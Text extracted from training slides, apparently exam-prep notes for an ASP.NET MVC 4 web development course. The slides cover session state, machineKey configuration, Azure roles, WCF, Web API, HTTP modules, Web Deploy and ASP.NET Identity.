Command timeout in seconds
Enable session state support on a database using
aspnet_regsql.exe
Uses tempdb by default
-d <database> -ssadd: adds support
-d <database> -ssremove: removes support
Calls SQL script: InstallSqlState.sql
Note: this utility is also used to enable other features
State Management
12. 20
Configuring Session State Modes
Configure to use State Server
<sessionState mode="StateServer"
stateConnectionString="tcpip=127.0.0.1:42424"
stateNetworkTimeout="10" />
The ASP.NET State Service must be running
Listens on port 42424
10
12. 21
State Management
Other Session State Configuration Options
Rename cookie for extra safety; security via obscurity
<sessionState cookieName="ASP.NET_SessionId"
Dynamically return connection strings when you have
multiple database servers
<sessionState partitionResolverType="type"
Log on to the session state SQL Server by using the host
identity (ApplicationPoolIdentity in IIS 7+)
<sessionState useHostingIdentity="true"
Or a specified identity
<identity impersonate="true"
username="..." password="..." />
12. 22
State Management
Design Choices
Technology
PROs
CONs
Cookie
Scalable, stored on browser
Can be disabled, insecure
QueryString
Scalable across multiple servers,
supported by all browsers
Insecure, very limited size
ViewState
Automatic, Web Forms only
Bulky pages, messy, evil
Session
Option for web farms and
recoverable storage
Can be difficult to scale
Application
Simple
Stays until removed
Cache
Automatic removal, expirations,
dependencies, priorites
In-memory only
TempData
Simple, automatically gets
removed when read, can last
beyond current request
Uses session state, MVC only
ViewData,
ViewBag
Simple
Only lasts for active request,
MVC only
ASP.NET State Management Recommendations
http://msdn.microsoft.com/en-us/library/z1hkazw7(v=vs.100).aspx
11
State Management
12. 23
machineKey Element
Controls tamper proofing and encryption of ViewState,
forms authentication tickets, and role cookies
For a single server the defaults are sufficient, but in a web farm
you must manually configure all servers to use the same keys
<machineKey validationKey="AutoGenerate,IsolateApps" [String=""
decryptionKey="AutoGenerate,IsolateApps" [String=""
validation="HMACSHA256" [SHA1="" | MD5="" | 3DES="" | AES="" | HMACSHA256=""
HMACSHA384="" | HMACSHA512="" | alg:algorithm_name="" decryption="Auto"
[Auto="" | DES="" | 3DES="" | AES="" | alg:algorithm_name=""] />
Use separate key values for each application, but duplicate
each applications keys across all servers in the farm
<machineKey
validationKey="32E35872597989D14CC1D5D9F5B1E94238D0EE32CF10AA2D2059533DF6035F4F"
decryptionKey="B179091DBB2389B996A526DE8BCD7ACFDBCAB04EF1D085481C61496F693DF5F4"
/>
machineKey Element (ASP.NET Settings Schema)
http://msdn.microsoft.com/en-us/library/vstudio/w8h3skw9(v=vs.100).aspx
12
13. 1
Modules 13
Using Windows Azure Web Services in
ASP.NET MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Using Windows Azure Web Services
13. 2
Contents
Exam Topic: Debug a Windows Azure application
Collect diagnostic information by using Windows Azure Diagnostics API Implement on
demand vs. scheduled
Choose log types, for example, event logs, performance counters, and crash dumps
Debug a Windows Azure application by using IntelliTrace and Remote Desktop
Protocol (RDP)
Exam Topic: Design and implement the Windows Azure role life cycle
Identify and implement Start, Run, and Stop events
Identify startup tasks (IIS configuration [app pool], registry
configuration, third-party tools)
Review 20480.C.Cross.Domain.Requests
13. 3
MOC Errata
Page 13-12
The MOC slide says
For the second reference (for the staging environment), it
should say
http://<guid>.cloudapp.net/<servicename>.svc
Windows Azure
13. 4
Install the Windows Azure SDK
Windows Azure
13. 5
Install the Windows Azure SDK
What gets installed:
Windows Azure
13. 6
Remote Desktop (RDP)
By using the Windows Azure SDK and Remote Desktop
Services, you can access Windows Azure roles and
virtual machines that are hosted by Windows Azure
Set up a certificate so that you can encrypt credentials
information
The certificates that you need for a remote desktop connection
are different from the certificates that you use for other
Windows Azure operations
The remote access certificate must have a private key which
should be exported as a PFX file
Using Remote Desktop with Windows Azure Roles
http://msdn.microsoft.com/en-us/library/windowsazure/gg443832.aspx
13. 7
Windows Azure
Startup Tasks
You can use startup tasks to perform operations before
a role starts
Operations that you might want to perform include installing a
component, registering COM components, setting registry keys,
or starting a long running process
Startup tasks are defined in the ServiceDefinition.csdef file
<Startup>
<Task commandLine="Startup.cmd"
executionContext="limited" taskType="simple" >
<Environment>
<Variable name="MyVersionNumber" value="1.0.0.0" />
</Environment>
</Task>
</Startup>
Run Startup Tasks in Windows Azure
http://msdn.microsoft.com/en-us/library/windowsazure/hh180155.aspx
13. 8
Windows Azure
RoleEntryPoint and RoleEnvironment Events
When you create Windows Azure projects each role will
have a WebRole.cs or WorkerRole.cs
Derives from RoleEntryPoint which has three methods you can
override: OnStart, OnStop, Run
Can handle events on RoleEnvironment class
Changed, Changing: if the configuration is changed
StatusCheck, Stopping
public class WebRole : RoleEntryPoint
{
public override bool OnStart()
{
RoleEnvironment.Changing
+= RoleEnvironment_Changing;
return base.OnStart();
void RoleEnvironment_Changing(
object sender,
RoleEnvironmentChangingEventArgs e)
{
Log(e.Changes);
e.Cancel = true;
Leveraging the RoleEntryPoint
http://brentdacodemonkey.wordpress.com/2011/09/24/leveraging-the-roleentrypoint-year-of-azure-week-12/
WCF Services
13. 9
Format of Returned Data
Before .NET 4 it defaults to XML but can be overridden
[OperationContract]
[WebGet(ResponseFormat = WebMessageFormat.Json)]
public long Mod(long x, long y);
With .NET 4 you can set it automatically
<webHttpEndpoint>
<standardEndpoint name="" helpEnabled="true"
automaticFormatSelectionEnabled="true"/>
When enabled the WCF infrastructure will try to
determine the appropriate response format using
1. The value of the HTTP Accept header of the request
2. The content-type of the request
3. The default response format for the operation
WCF Services
13. 10
ChannelFactory / WebChannelFactory (1/2)
Channel factories can be used to dynamically create a
channel (i.e. proxy) if you do not have one
But you will need a reference to the assembly that defines the
contracts i.e. interfaces (this is why its good to separate
interfaces from implementation)
WebChannelFactory automatically adds the WebHttpBehavior
and WebHttpBinding if they are missing to allow HTTP GETs
How to define an endpoint and proxy programmatically
Create an address that points to the service
var address = new EndpointAddress(
"http://localhost/MathSite/MathService.svc");
Create a binding
var binding = new WSHttpBinding();
13. 11
WCF Services
ChannelFactory / WebChannelFactory (2/2)
Create a ChannelFactory (proxy builder) for the service
contract (the interface IMath), binding and address
var cf = new ChannelFactory<IMath>(binding, address);
Use the channel factory to create a channel (proxy) for the
service and then call its methods
IMath mathService = cf.CreateChannel();
double s = mathService.Add(3, 39);
When finished, close the proxy and dispose of the factory
(mathService as IClientChannel).Close();
cf.Dispose();
13. 12
Data Contracts
Serializing Object References
DataContractSerializer serializes by value (default)
[DataMember] public Address BillTo = someAddress;
[DataMember] public Address ShipTo = someAddress;
<BillTo>contents of someAddress</BillTo>
<ShipTo>contents of someAddress</ShipTo>
To get the DataContractSerializer to preserve object
references (especially useful for circular references)
[DataContract(IsReference=true)]
public class Order
[DataContract(IsReference=true)]
public class Address
<BillTo id="1">contents of someAddress</BillTo>
<ShipTo ref="1" />
Interoperable Object References
http://msdn.microsoft.com/en-us/library/cc656708.aspx
DataContract Serializer and IsReference property
http://zamd.net/2008/05/20/datacontract-serializer-and-isreference-property/
Data Contracts
13. 13
Resource Description Framework (RDF)
RDF is a standard model for data interchange on the
Web
RDF has features that facilitate data merging even if the
underlying schemas differ, and it specifically supports the
evolution of schemas over time without requiring all the data
consumers to be changed
RDF extends the linking structure of the Web to use URIs to
name the relationship between things as well as the two ends of
the link
Resource Description Framework (RDF)
http://www.w3.org/RDF/
14. 1
Module 14
Implementing Web APIs in
ASP.NET MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
14. 2
MOC Errata
Page 14-10
The MOC says NoAction in multiple sentences
It should say NonAction
[NonAction]
public void DoSomething()
{
Exam Topic: none
14. 3
HTTP and REST
POST versus PUT
The actual function performed by the POST method is
determined by the server and POST is designed to allow a
uniform method to cover the following functions: []
Extending a database through an append operation
So POST can be used to insert and the server should respond
with 201 (Created), or POST can be used for any meaning
PUT If the Request-URI refers to an already existing resource,
the enclosed entity SHOULD be considered as a modified version
of the one residing on the origin server. If the Request-URI does
not point to an existing resource, and that URI is capable of
being defined as a new resource by the requesting user agent,
the origin server can create the resource with that URI
So PUT can be used to insert or update and the server should
respond with either 201 (Created) or 200 (OK) or 204 (No
content)
Method Definitions
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
14. 4
HTTP and REST
Designing the URIs
Choose common sense URIs so developers can quickly
work out how to access any resource and your service
becomes almost self-documenting
Design your service API as if you were designing the URLs for a
web site i.e. make them logical enough that an end user could
work out how to use them if shown a few examples
Task
HTTP Method
Relative URI
Retrieve all entities
GET
/api/orders
Retrieve single entity
GET
/api/orders/id
Retrieve by custom
GET
/api/orders?category=category
Create new entity
POST
/api/orders
Update entity
PUT
/api/orders/id
Remove entity
DELETE
/api/orders/id
15. 1
Module 15
Handling Requests in ASP.NET
MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Handling Requests in ASP.NET MVC 4 Web Applications
15. 2
Contents
Exam Topic: Design and implement a Web Socket strategy
Read and write string and binary data asynchronously (long-running data transfers)
Choose a connection loss strategy
Decide a strategy for when to use Web Sockets
Exam Topic: Design HTTP modules and handlers
Implement synchronous and asynchronous modules and handlers
Choose between modules and handlers in IIS
Exam Topic: Control application behavior by using MVC extensibility points
Control application behavior by using action results, viewengines, model
binders, and route handlers
From the 20480 HTML5 course review the following
20480.13.Web.Sockets
Lab
Do NOT use the pre-release version of SignalR as described in
the lab, use the most recent version
HTTP Modules
15. 3
Implementing
HTTP handlers only process requests for file extensions
they are registered for; if you want to process all
requests, use an HTTP module instead
Create a class that implements IHttpModule
public class MyModule : IHttpModule
Implement Init method and add handlers for any events you
want to intercept
public void Init(HttpApplication a)
{
this.app = a;
this.app.BeginRequest += LogAllRequestsMethod;
HTTP Modules
15. 4
Configuring
HTTP module must be registered in .config
For IIS 6.0 or IIS 7.0 in Classic mode
<system.web>
<httpModules>
<add name="MyMod" type="MyNamespace.MyModule" />
For IIS 7.0 in Integration mode
<system.webServer>
<modules>
<add name="MyMod" type="MyNamespace.MyModule"
precondition="managedHandler"/>
The precondition causes the module to be invoked only for
requests to the ASP.NET application resources, such as .aspx
files or managed handlers (excludes static files like .htm)
How to: Configure the <system.webServer> Section for IIS 7.0
http://msdn.microsoft.com/en-us/library/bb763179.aspx
15. 5
HTTP Modules
Ordering
Order modules are
processed is defined in
.config file
Order of events
(non-deterministic)
Order of events
(sequential)
BeginRequest
AuthenticateRequest
AuthorizeRequest
PreSendRequestHeaders
ResolveRequestCache
PreSendRequestContent
AcquireRequestState
Error
PreRequestHandlerExecute
PostRequestHandlerExecute
ReleaseRequestState
UpdateRequestCache
EndRequest
HTTP Modules
15. 6
HTTP Message Handlers
A message handler is a class that receives an HTTP
request and returns an HTTP response
Typically, a series of message handlers are chained together, so
they act more like HTTP modules than HTTP handlers!
If a delegating handler creates the
response without calling
base.SendAsync, the request skips
the rest of the pipeline
This can be useful
for a handler that
validates the request
(creating an error
response)
HTTP Message Handlers
http://www.asp.net/web-api/overview/working-with-http/http-message-handlers
15. 7
HTTP Modules
HTTP Message Handlers Example
public class MethodOverrideHandler : DelegatingHandler
{
readonly string[] _methods = { "DELETE", "HEAD", "PUT" };
const string _header = "X-HTTP-Method-Override";
protected override Task<HttpResponseMessage> SendAsync(
HttpRequestMessage request, CancellationToken cancellationToken)
{
if (request.Method == HttpMethod.Post && request.Headers.Contains(_header))
{
var method = request.Headers.GetValues(_header).FirstOrDefault();
if (_methods.Contains(method, StringComparer.InvariantCultureIgnoreCase))
{
request.Method = new HttpMethod(method);
}
}
var response = base.SendAsync(request, cancellationToken);
return response;
} // for clients that cannot send certain HTTP request types,
}
// such as PUT or DELETE
using System.Net.Http;
using System.Threading;
using System.Threading.Tasks;
Extending MVC
15. 8
Interfaces and Classes
Interfaces and classes
IActionFilter: OnActionExecuting, OnActionExecuted methods
IController (Controller): Execute method
IRouteHandler (MvcRouteHandler, PageRouteHandler):
GetHttpHandler method
Use RouteTable.Routes.Add and pass in the instance of Route
or RouteBase instead of using MapRoute
IRouteConstraint (HttpMethodConstraint): Match method
16. 1
Module 16
Deploying ASP.NET MVC 4
Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Deploying ASP.NET MVC 4 Web Applications
16. 2
Contents
Topic
Slide
Web Deploy
ASP.NET Command Line Tools
Managing a Web AppDomain
Web.config Transformations
11
IIS
13
Common Ports
16
Exam Topic: Design a distributed application
Design a hybrid application (on premise vs. off premise, including Windows Azure)
Plan for session management in a distributed environment
Plan web farms
Web Deploy
16. 3
Overview
For any question about deployment tools, the answer is
almost always use Web Deploy because
It works securely
It is powerful and flexible by changing the web publish pipeline
You can install SSL certificates using a custom target
Only choose to use FTP, XCopy, VPN, SSH, and so on if
you have a very good reason
Web Deploy
16. 4
Packages
IIS Settings
Application Pool
Authentication method
Error Handling
Deploy Database Scripts
Production Settings
Release / Debugging
Connection Strings
Capable of Custom Extensions
Security Certificates
Windows Registry Settings
Assemblies in Global Assembly Cache (GAC)
16. 5
Web Deploy
Publishing Pipeline
Build
Collect
Transform
Web Deploy
Package /
Publish
Build
Collect binary
and .pdb files
Transform
web.config
Collect GAC, COM,
Registry settings
Create
package or
publish
Collect
references
Exclude files
Collect IIS settings
Collect
content
Precompile
Collect SSL
Certificates
Create SQL scripts
Create manifest
Custom extensions
16. 6
Web Deploy
Importing Package into IIS
Parameters.xml
Web Deploy
Package.zip
IIS Provider
IIS
Database
Provider
Database
Web Content
Provider
Web content
Other
Other
Providers
Other
Providers
Providers
Your custom
Provider
COM
GAC
Custom Asset
ASP.NET Command Line Tools
16. 7
ASP.NET IIS Registration Tool
aspnet_regiis.exe: ASP.NET/IIS configuration
Can be used to customize script maps
-lv: list status and paths of all versions of ASP.NET installed
-i: installs ASP.NET
-u: uninstalls ASP.NET; -ua: uninstalls all versions of ASP.NET
-pef section webApplicationDirectory: encrypts section
-pdf section webApplicationDirectory: decrypts section
-pe section pkm: encrypts section in Machine.config
-pd section -pkm: decrypts section in Machine.config
and many more!
ASP.NET Command Line Tools
16. 8
ASP.NET SQL Server Registration Tool
aspnet_regsql.exe
Application services: Membership (m), Role Manager (r), Profile
(p), Web Parts Personalization (c), Web Events (w)
-A all, -A p , -A mcw: add service(s)
-R all, -R p , -R mcw: remove service(s)
SQL cache dependency: SQL Server 7.0 or later
-d <database> ed/dd: enable/disable database
-t <table> -et/dt: enable/disable table
Session state (uses tempdb by default)
-d <database> -ssadd: adds support
-d <database> -ssremove: removes support
Managing a Web AppDomain
16. 9
Taking a Web Project Offline
To take a web project temporarily offline
Create a file named app_offline.htm in the root of a web site
The AppDomain will be unloaded and the contents of the static
file displayed instead of any response
Warning! Your site will return 503 Server Unavailable
Warning! Versions of Internet Explorer older than 8.0 give a
missing file error with small app_offline.htm files, so add about
a screen full of HTML comments to make it big enough (it must
be more than 512 bytes)
You can also use an entry in .config
This is what the WSAT tool does to take an application offline
<httpRuntime enable="false" />
Managing a Web AppDomain
16. 10
What Causes a Web Site to Restart?
Changes to
Machine.config
Web.config(s)
Global.asax
Contents of /bin
Directory is renamed
Excessive recompilations for a page when using
dynamically-recompiled web sites (defaults to 15)
Changes to Code Access Security (CAS) policy files
Web.config Transformations
16. 11
Changing and Removing Attributes
Web.config
<connectionStrings>
<add name="MyDB"
connectionString="Data Source=TestServer;..."
<system.web>
<compilation debug="true"
Web.Release.config
<connectionStrings>
<add name="MyDB"
connectionString="Data Source=ProductServer;..."
xdt:Transform="SetAttributes" xdt:Locator="Match(name)"
<system.web>
<compilation xdt:Transform="RemoveAttributes(debug)" />
Web.config Transformations
16. 12
Replacing Elements
Web.config
<customErrors defaultRedirect="Error.aspx"
mode="RemoteOnly">
<error statusCode="500" redirect="ServerError.htm" />
Web.Debug.config
<customErrors defaultRedirect="DetailedError.aspx"
mode="Off" xdt:Transform="Replace">
<error statusCode="500" redirect="InternalError.htm" />
16. 13
IIS
Web Farms and Web Gardens
A web farm is when you have multiple physical servers
A web garden is when you have multiple processes in
an application pool
16. 14
IIS
ASP.NET Integration with IIS 7
IIS 7 supports both the old and the new modes
Can be used side by side on the same server in different
application pools
Classic
Integration
ASP.NET Integration with IIS 7
http://learn.iis.net/page.aspx/243/aspnet-integration-with-iis/
16. 15
IIS
Migrating
ASP.NET operates in Integrated mode by default
Because of the configuration unification, some applications may
require migration to operate properly in Integrated mode
The following configurations cause a migration error
<httpModules>: ASP.NET modules must be specified with native
modules in the unified <system.webServer>/<modules>
<httpHandlers>: ASP.NET handler mappings must be specified in
the unified <system.webServer>/<handlers>
This replaces both the <httpHandlers> configuration and the
scriptmaps configuration, both of which previously had to be
configured to set up an ASP.NET handler mapping
<identity impersonate="true" />
If your application does not rely on impersonating the requesting user in the
BeginRequest and AuthenticateRequest stages (the only stages where impersonation is
not possible in Integrated mode), ignore this error by adding the following to your
applications web.config: <validation validateIntegratedModeConfiguration="false"
16. 16
Common Ports
Port
Description
21
FTP data transfer
22
Secure Shell (SSH) used for secure logins, file transfers (scp, sftp)
and port forwarding
23
Telnet protocolunencrypted text communications
25
Simple Mail Transfer Protocol (SMTP)used for e-mail routing
between mail servers
53
Domain Name System (DNS)
79
Finger protocol
80
Hypertext Transfer Protocol (HTTP)
88
Kerberosauthentication system
443
Hypertext Transfer Protocol over TLS/SSL (HTTPS)
666
Doom, first online first-person shooter
List of TCP and UDP port numbers
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
A. 1
Appendix A
Whats New in Visual Studio 2013
and Updated Exam
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Whats New in Visual Studio 2013
A. 2
Contents
Topic
SignalR
Slide
4
Filters
Browser Testing
10
ASP.NET Identity
11
Token Formats
17
Azure Caching
18
Exam Topics: Design and implement a Web Socket strategy
Implement SignalR
Exam Topics: Design and implement MVC controllers and actions
Apply authentication filters
Specify an override filter
Whats New in Visual Studio 2013
A. 3
Contents
Exam Topics: Test a web application
Create and run web tests (including using Browser Link)
Debug a web application in multiple browsers and mobile emulators
Exam Topics: Debug a Windows Azure application
Debug a Windows Azure application by using remote debugging
Interact directly with remote Windows Azure websites using Server Explorer
Exam Topics: Configure authentication
Configure ASP.NET Identity
Exam Topics: Design and implement claims-based authentication
across federated identity stores
Handle token formats (for example, oAuth, OpenID, Microsoft Account,
Google, Twitter, and Facebook) for SAML and SWT tokens
Exam Topics: Design a caching strategy
Implement Azure caching
SignalR
A. 4
What Is SignalR 2.0?
Incredibly simple real-time web for .NET
Ability to have your server-side code push content to the
connected clients as it happens, in real-time
SignalR will use WebSockets under the covers when its
available, and gracefully fallback to other technologies when it
isnt, while your application code stays the same
Install it with NuGet
Install-Package Microsoft.AspNet.SignalR
Install a sample application
Install-Package Microsoft.AspNet.SignalR.Sample
Learn About ASP.NET SignalR
http://www.asp.net/signalr
A. 5
SignalR
Communication
SignalR provides a simple
API for creating server-toclient remote procedure
calls (RPC) that call
JavaScript functions in
client browsers from
server-side .NET code
SignalR
A. 6
Transport Selection Process
Steps that SignalR uses to decide which transport to use
If the browser is IE8 or earlier, Long Polling is used
If JSONP is configured (that is, the jsonp parameter is set to
true when the connection is started), Long Polling is used
If a cross-domain connection is being made then WebSocket will
be used if the client supports CORS and both support WebSocket
If JSONP is not configured and the connection is not crossdomain, WebSocket will be used if both the client and server
support it
If either the client or server do not support WebSocket, Server
Sent Events is used if it is available
If Server Sent Events is not available, Forever Frame is
attempted
If Forever Frame fails, Long Polling is used
A. 7
SignalR
Monitoring Transports
You can determine what transport your application is
using by enabling logging on your hub
$.connection.hub.logging = true;
You can request transport preferences
connection.start({ transport: ['webSockets','longPolling'] });
Tutorial: Getting Started with SignalR 2.0 and MVC 5
http://www.asp.net/signalr/overview/signalr-20/getting-started-with-signalr-20/tutorial-getting-started-with-signalr-20-and-mvc-5
A. 8
Filters
Authentication Filters
using System.Web.Mvc;
using System.Web.Mvc.Filters;
Applied prior to any Authorization filters
To create a custom authentication filter
public class BasicAuthAttribute : ActionFilterAttribute, IAuthenticationFilter
Implement two methods
// executed first and can be used to perform any needed authentication
public void OnAuthentication(AuthenticationContext filterContext)
public void OnAuthenticationChallenge(
AuthenticationChallengeContext filterContext)
{
// restrict access based upon the authenticated user's principal
var user = filterContext.HttpContext.User;
if (user == null || !user.Identity.IsAuthenticated)
{
filterContext.Result = new HttpUnauthorizedResult();
ASP.NET MVC 5 Authentication Filters
http://visualstudiomagazine.com/articles/2013/08/28/asp_net-authentication-filters.aspx
Filters
A. 9
Overriding Filters
We can exclude a specific action method or controller
from the global filter or controller level filter
OverrideAuthenticationAttribute,
OverrideAuthorizationAttribute, OverrideActionFiltersAttribute,
OverrideResultAttribute, OverrideExceptionAttribute
[Authorize(Users = "Admin")]
public class HomeController : Controller
{
public ActionResult Index() {
ViewBag.Message = "Welcome to ASP.NET MVC!";
return View();
}
[OverrideAuthorization]
public ActionResult About() {
return View();
}
Filter Overrides in ASP.Net MVC 5
http://www.c-sharpcorner.com/UploadFile/ff2f08/filter-overrides-in-Asp-Net-mvc-5/
Browser Testing
A. 10
Browser Link
A communication channel between the development
environment and one or more web browsers
Refresh your web application in several browsers at once, which
is useful for cross-browser testing
Use Ctrl to select multiple browsers for testing
To enable for static files
<system.webServer> <handlers>
<add name="Browser Link for HTML" path="*.html" verb="*"
type="System.Web.StaticFileHandler, System.Web,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
resourceType="File" preCondition="integratedMode" />
Using Browser Link in Visual Studio 2013
http://www.asp.net/visual-studio/overview/2013/using-browser-link
ASP.NET Identity
A. 11
History of Identity Management
ASP.NET Membership
Designed to solve site membership requirements that were
common in 2005
ASP.NET Simple Membership
Doesnt work well with existing ASP.NET Membership providers
ASP.NET Universal Providers
Built on EF Code First
The assumption that users will log in by entering a user
name and password that they have registered in your
own application is no longer valid
The ASP.NET Identity System
http://www.asp.net/identity
ASP.NET Identity
A. 12
Modernizing Identity Management
A modern membership system must enable redirectionbased log-ins to authentication providers such as
Facebook, Twitter, and others
ASP.NET Identity uses Entity Framework Code First to
implement all of its persistence mechanism
You can easily add social log-ins such as Microsoft Account,
Facebook, Twitter, Google, and others to your application, and
store the user-specific data in your application
ASP.NET authentication is now based on OWIN
middleware that can be used on any OWIN-based host
Introduction to ASP.NET Identity
http://www.asp.net/identity/overview/getting-started/introduction-to-aspnet-identity
ASP.NET Identity
A. 13
Registering
When the user clicks the Register
button, the Register action of the
Account controller creates the user by
calling the ASP.NET Identity API
// POST: /Account/Register
[HttpPost]
[AllowAnonymous]
[ValidateAntiForgeryToken]
public async Task<ActionResult> Register(RegisterViewModel model)
var user = new ApplicationUser() { UserName = model.UserName };
var result = await UserManager.CreateAsync(user, model.Password);
if (result.Succeeded)
{
await SignInAsync(user, isPersistent: false);
return RedirectToAction("Index", "Home");
ASP.NET Identity
A. 14
Signing In
If the user was successfully created, she is logged in by
the SignInAsync method
private async Task SignInAsync(ApplicationUser user, bool isPersistent)
{
AuthenticationManager.SignOut(DefaultAuthenticationTypes.ExternalCookie);
var identity = await UserManager.CreateIdentityAsync(
user, DefaultAuthenticationTypes.ApplicationCookie);
AuthenticationManager.SignIn(new AuthenticationProperties()
{ IsPersistent = isPersistent }, identity);
}
ASP.NET Identity and OWIN Cookie Authentication are claimsbased system so the framework requires the app to generate a
ClaimsIdentity for the user using CreateIndentityAsync
The code above signs in the user by using the
AuthenticationManager from OWIN and calling SignIn and
passing in the ClaimsIdentity
ASP.NET Identity
A. 15
Components
Packages in green make up the ASP.NET Identity system
All the other packages are dependencies which are needed to
use the ASP.NET Identity system in ASP.NET applications
ASP.NET Identity
A. 16
Tutorial
MVC 5 with Google and Facebook authentication
This tutorial shows you how to build an ASP.NET MVC 5 web
application that enables users to log in using OAuth 2.0 or
OpenID with credentials from an external authentication
provider, such as Facebook, Twitter, Microsoft, or Google
For simplicity, this tutorial focuses on working with credentials
from Facebook and Google
Enabling these credentials in your web sites provides a
significant advantage because millions of users already have
accounts with these external providers
These users may be more inclined to sign up for your site if they
do not have to create and remember a new set of credentials
The tutorial also shows how to add profile data for the user, and
how to use the Membership API to add roles
Code! MVC 5 App with Facebook, Twitter, LinkedIn and Google OAuth2 Sign-on
http://www.asp.net/mvc/tutorials/mvc-5/create-an-aspnet-mvc-5-app-with-facebook-and-google-oauth2-and-openid-sign-on
Token Formats
A. 17
Supported in ACS
ACS can issue security tokens in the following formats
Security Assertion Markup Language (SAML) 1.1 and 2.0
<assertion id="_4fe09cda-cad9-49dd-b493-93494e1ae4f9"
issueinstant="2012-09-18T20:42:11.626Z"
version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
<issuer>https://test05.accesscontrol.windows.net/</issuer>
Simple Web Token (SWT)
Audience=http%3a%2f%2flocalhost%2fmyservice&ExpiresOn=1255913549
Issuer=https%3a%2f%2fmyservice.accesscontrol.windows.net%2f&role
=Admin%2cUser&role=Admin%2cUser&&HMACSHA256=sT7Hr9z%2b3t1oDFLpq5
GOToVsu6Dyxpq7hHsSAznmwnI%3d
JSON Web token (JWT)
Token Formats Supported in ACS
http://msdn.microsoft.com/en-us/library/gg185950.aspx
Microsoft Azure Caching
A. 18
Implementing
Build highly responsive applications using a distributed
cache that scales independently from your application
using Microsoft.ApplicationServer.Caching;
DataCache cache = new DataCache("default");
// Add the string "value" to the cache, keyed by "item"
cache.Add("item", "value", TimeSpan.FromMinutes(30));
DataCacheItem item = cache.GetCacheItem("item");
TimeSpan timeRemaining = item.Timeout;
Cache
http://azure.microsoft.com/en-us/documentation/services/cache/
How to Use Azure Cache Service
http://azure.microsoft.com/en-us/documentation/articles/cache-dotnet-how-to-use-service/
You might also like
- SignalR Chat App With ASP - Net WebForm and BootStrap - Part Three - CodeProjectNo ratings yetSignalR Chat App With ASP - Net WebForm and BootStrap - Part Three - CodeProject8 pages
- Expert ASP NET Web API 2 For MVC Developers 1st Edition Adam Freeman Updated 2025100% (14)Expert ASP NET Web API 2 For MVC Developers 1st Edition Adam Freeman Updated 202599 pages
- Modern Tkinter Python For Developers - Xiaolu HouNo ratings yetModern Tkinter Python For Developers - Xiaolu Hou372 pages
- Building A RESTful Web Service With Spring - Sample ChapterNo ratings yetBuilding A RESTful Web Service With Spring - Sample Chapter13 pages
- Express - Js Blueprints - Sample ChapterNo ratings yetExpress - Js Blueprints - Sample Chapter26 pages
- Core With Dapper and Vs 2017 Using JWT Authentication WEB API and Consume It in Angular2 Client Application - CodeProjectNo ratings yetCore With Dapper and Vs 2017 Using JWT Authentication WEB API and Consume It in Angular2 Client Application - CodeProject11 pages
- ASP.NET Tutorial: Next-Gen Server ScriptingNo ratings yetASP.NET Tutorial: Next-Gen Server Scripting45 pages
- Custom Button - Custom Controls WinForm C # - RJ Code AdvanceNo ratings yetCustom Button - Custom Controls WinForm C # - RJ Code Advance13 pages
- Subscribe To Deepl Pro To Edit This Document.: Visit For More InformationNo ratings yetSubscribe To Deepl Pro To Edit This Document.: Visit For More Information35 pages
- Android Notes Gondwana University GadchiroliNo ratings yetAndroid Notes Gondwana University Gadchiroli99 pages
- MCSD Web Applications ASP Net CoursewareNo ratings yetMCSD Web Applications ASP Net Courseware202 pages
- Developing Asp Net Core MVC Web Applications m20486 m20486 PDFNo ratings yetDeveloping Asp Net Core MVC Web Applications m20486 m20486 PDF6 pages
- You Will Learn How To: Course Number: 8440 Duration: 5 DaysNo ratings yetYou Will Learn How To: Course Number: 8440 Duration: 5 Days7 pages
- MCTS Web Applications Development With Microsoft NET 4No ratings yetMCTS Web Applications Development With Microsoft NET 44 pages
- 4 Web Applications: Course 20486A 5 Days, Instructor-LedNo ratings yet4 Web Applications: Course 20486A 5 Days, Instructor-Led7 pages
- Q2 2017 Financial & Operating Results: Friday, July 28, 2017No ratings yetQ2 2017 Financial & Operating Results: Friday, July 28, 201736 pages
- Example of A Hotel Organizational ChartNo ratings yetExample of A Hotel Organizational Chart14 pages
- Rosli 2022 IOP Conf. Ser. Earth Environ. Sci. 1067 012054No ratings yetRosli 2022 IOP Conf. Ser. Earth Environ. Sci. 1067 01205410 pages
- Sample: Session 3 Extension Activity: Advanced Cropping TechniquesNo ratings yetSample: Session 3 Extension Activity: Advanced Cropping Techniques3 pages
- A Case Study On The Different Major Players of Fuel Oil in The PhilippinesNo ratings yetA Case Study On The Different Major Players of Fuel Oil in The Philippines6 pages
- Automic - Automation 24.2.0 2024-10-23 Update-InformationNo ratings yetAutomic - Automation 24.2.0 2024-10-23 Update-Information4 pages
